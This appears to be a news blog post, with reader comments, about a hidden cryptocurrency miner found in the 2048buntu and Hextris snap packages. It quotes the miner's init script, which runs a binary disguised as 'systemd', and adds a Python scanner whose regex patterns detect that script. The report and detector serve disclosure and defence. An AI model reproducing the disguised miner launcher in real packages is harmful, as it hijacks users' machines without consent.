Oh, snap! Just because some packages are available to install directly from the Ubuntu Software Center doesn't make them safe. This was proven by the recent discovery of malware in some snap packages from the Ubuntu Snaps Store.
At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".
The report comes from a bug report which mentions that the 2048buntu snap package (and other packages by Nicolas Tomb) contains a hidden cryptocurrency miner. You can see the init script below:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
    # the miner binary ships inside the snap itself under the name "systemd"
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch: if the first invocation fails, retry with an argument chosen from the CPU core count
    cores=($(grep -c ^processor /proc/cpuinfo))
    if (( $cores < 4 )); then
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
    else
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
    fi
}
Yes, myfirstferrari@protonmail.com was used in the miner script. I guess that's one way of getting a Ferrari... 🙂.
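For anyone wanting to check their own machine for the same pattern, here is an added Python example (not code from the article or from any project mentioned in it): it scores a script against indicators taken from the quoted miner script and walks /snap/<name>/current for shebang scripts that match more than one of them. The benign launcher and the indicator names are constructed for the example; the miner script is the one quoted above.

```python
import re
from pathlib import Path

# The miner's init script as quoted in the article, used here as sample input.
MINER_SCRIPT = """#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
"""
# A constructed, ordinary snap launcher for comparison (not from the page).
BENIGN_LAUNCHER = '#!/bin/sh\nexec "$SNAP/usr/bin/2048" "$@"\n'

INDICATORS = [
    # a binary named "systemd" inside the snap's own tree; the real one
    # lives under /lib/systemd or /usr/lib/systemd, never under /snap
    ("systemd_inside_snap", re.compile(r"/snap/[^/\s]+/(?:current|\d+)/systemd\b")),
    # an e-mail address as the -u argument, the usual shape of pool credentials
    ("email_as_user_arg", re.compile(r"-u\s+[\w.+-]+@[\w-]+\.[\w.-]+")),
    # counting cores from /proc/cpuinfo to choose how many threads to run
    ("core_count_probe", re.compile(r"grep\s+-c\s+\^?processor\s+/proc/cpuinfo")),
    # the coin ticker from the quoted script passed as a long option
    ("currency_flag", re.compile(r"--(?:\$currency|bcn)\b")),
]

def scan_script(text: str) -> list[str]:
    """Return the names of every indicator that matches one script's text."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def scan_snap_tree(root: str = "/snap", min_hits: int = 2) -> dict[str, list[str]]:
    """Walk each installed snap's current revision and report shebang scripts
    with at least `min_hits` distinct indicators (one hit alone proves little)."""
    hits: dict[str, list[str]] = {}
    for path in Path(root).glob("*/current/**/*"):
        try:
            with path.open("rb") as fh:
                if fh.read(2) != b"#!":
                    continue
                found = scan_script(fh.read().decode(errors="ignore"))
        except OSError:  # directories, sockets, unreadable files
            continue
        if len(found) >= min_hits:
            hits[str(path)] = found
    return hits
```

Run scan_snap_tree() as root on an Ubuntu box with snapd installed; an empty dict means no script under /snap matched two or more indicators.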
An interesting aspect is that Nicolas Tomb used a proprietary license for at least some of his snaps. For example, the 2048buntu snap was submitted as proprietary (the game itself was not developed by Nicolas). The game in question, 2048, uses an MIT license, which permits distributing it as proprietary software, without making the source code available, as long as the copyright notices are retained.
Side note: 2048buntu was removed from the Ubuntu Snap Store, but you can still check out its page via Google Cache. The package contents, however, can no longer be inspected (unless they're on GitHub somewhere, but I couldn't find them).
How was this possible? Well, the Ubuntu Snap Store allows anyone to upload snap packages, unlike the deb packages available in the official Ubuntu repositories. The reason for this is to make packages more easily installable for its users.
What's your opinion on this? Do you think more and more malware will get through to users if anyone is allowed to upload packages to the Ubuntu Store, or was this an isolated incident?
News via Reddit (u/Kron4ek).
Canonical doesn't care, they just like to brag about how many apps they have.
I'm not totally against letting anyone upload to the Ubuntu Store but it should ALL have source code available.
I have the same 2048 game on one of my Android phones as a game built with Kivy Python. Now I see why the battery was draining so fast.
The game itself (its source) wasn't the culprit, but the snap package available on the Ubuntu Snaps Store.
This is why the AUR on Arch is a separate entity from the regular repos and even custom repos. The AUR has stuff from anyone, but it's clear to everyone what the risks associated with it are, and so people use it (hopefully) with caution.
Does this mean that malware can be found in Ubuntu repositories too?
There is no reason to assume that; they remain heavily peer reviewed, so they are extremely unlikely to contain anything like that.
There should be no non-free software in the Ubuntu store. Period.
That won't happen given Ubuntu already allows nonfree repositories to be used (even without snappy). I think you're best off just using a GNU-endorsed GNU/Linux distribution like Trisquel or gNewSense.
Having said that, if you would like change in the Ubuntu store then try creating a topic on https://community.ubuntu.com/ , and for the snap store try creating a topic on https://forum.snapcraft.io/c/store . Nothing will change if you just complain in comment sections; however, people may respond to what you think if you post on those forums. Do give reasons why you think that there should be no non-free software on those stores, however.
sudo apt purge snapd
is in my config for Ubuntu
Seriously, no one finds it strange that a 2048 game could be 138.8 MB? That's a huge red flag, no?
Snaps ship with system libraries, so all packages are quite large. The GIMP 2.10 snap, for example, is 213 MB: https://snapcraft.io/gimp